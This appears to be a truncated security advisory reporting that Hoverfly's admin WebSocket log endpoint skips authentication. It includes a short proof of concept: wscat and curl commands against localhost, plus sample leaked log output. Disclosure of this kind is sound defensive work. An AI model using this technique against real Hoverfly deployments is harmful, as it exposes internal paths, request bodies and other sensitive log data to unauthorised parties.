Summary Hoverfly’s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API. Consequently, an unauthenticated remote attacker can: Stream real-time application logs (information disclosure). Gain insight into internal file paths, request/response bodies, and other potentially sensitive data emitted in logs. PoC Start Hoverfly with authentication enabled: ./hoverfly -auth Confirm REST API requires credentials: curl -i https://localhost:8888/api/v2/hoverfly/version Connect to the WebSocket endpoint without credentials: “` wscat -c ws://localhost:8888/api/v2/ws/logs Connected (press CTRL+C to quit) … logs stream immediately … (You would need to send a message to start receiving stream) “` “` wscat -c ws://localhost:8888/api/v2/ws/logs Connected (press CTRL+C to quit) hi! < {"logs":[{"level":"info","msg":"Log level set to verbose","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"Using memory backend","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"User added successfully","time":"2025-07-20T17:07:00+05:30","username":""},{"level":"info","msg":"Enabling proxy authentication","time":"2025-07-20T17:07:00+05:30"},{"Destination":".","Mode":"simulate","ProxyPort":"8500","level":"info","msg":"Proxy prepared…","time":"2025-07-20T17:07:00+05:30"},{"destination":".","level":"info","mode":"simulate","msg":"current proxy…Read More